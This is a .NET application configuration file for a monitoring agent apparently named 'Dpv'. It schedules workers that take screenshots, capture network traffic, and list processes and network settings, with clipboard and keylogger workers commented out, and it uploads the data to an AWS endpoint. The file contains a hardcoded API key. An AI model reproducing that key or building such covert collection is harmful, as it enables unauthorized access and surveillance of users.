<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <sectionGroup name="dpvSettings">
      <section name="timersConfig" type="DpvClassLibrary.Configuration.TimersConfigSection, DpvClassLibrary" allowDefinition="Everywhere" allowLocation="true" />
    </sectionGroup>
  </configSections>
  <appSettings>
    <add key="DpvClassLibrary.Receivers.DataPackageEnvelopeAwsReceiver.BasePath" value="https://1qk4wqinaf.execute-api.eu-west-1.amazonaws.com/test" />           
    <add key="debugdump" value="false" />
    <add key="apiKey" value="uBtB4QbiFk8vH0R65faWDa9VYRZ5w6SY31FSe8hp"/>     
    <add key="ClientSettingsProvider.ServiceUri" value="" />
  </appSettings>
 
  <dpvSettings>
    <timersConfig>
      <timers>
        <!--<timer secondsBetweenWork="123" workerToInstantiate="DpvClassLibrary.Workers.ClipboardTextWorker, DpvClassLibrary, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null"/>-->
        <!--<timer secondsBetweenWork="51" workerToInstantiate="DpvClassLibrary.Workers.KeyloggerWorker, DpvClassLibrary, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null"/>-->
        <timer secondsBetweenWork="61" workerToInstantiate="DpvClassLibrary.Workers.NetworkTrafficWorker, DpvClassLibrary, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
        <timer secondsBetweenWork="63" workerToInstantiate="DpvClassLibrary.Workers.NetworkConfigRetrieverWorker, DpvClassLibrary, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
        <timer secondsBetweenWork="61" workerToInstantiate="DpvClassLibrary.Workers.RunningProcessesWorker, DpvClassLibrary, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
        <timer secondsBetweenWork="30" workerToInstantiate="DpvClassLibrary.Workers.ScreenshotWorker, DpvClassLibrary, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
      </timers>
    </timersConfig>
  </dpvSettings>
  <!--<System.Windows.Forms.ApplicationConfigurationSection>
    <add key="DpiAwareness" value="PerMonitorV2"/>
  </System.Windows.Forms.ApplicationConfigurationSection>-->
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
  </startup>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
  <system.net>
    <defaultProxy useDefaultCredentials="true" />
  </system.net>
  <system.web>
    <membership defaultProvider="ClientAuthenticationMembershipProvider">
      <providers>
        <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />
      </providers>
    </membership>
    <roleManager defaultProvider="ClientRoleProvider" enabled="true">
      <providers>
        <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86400" />
      </providers>
    </roleManager>
  </system.web>
</configuration>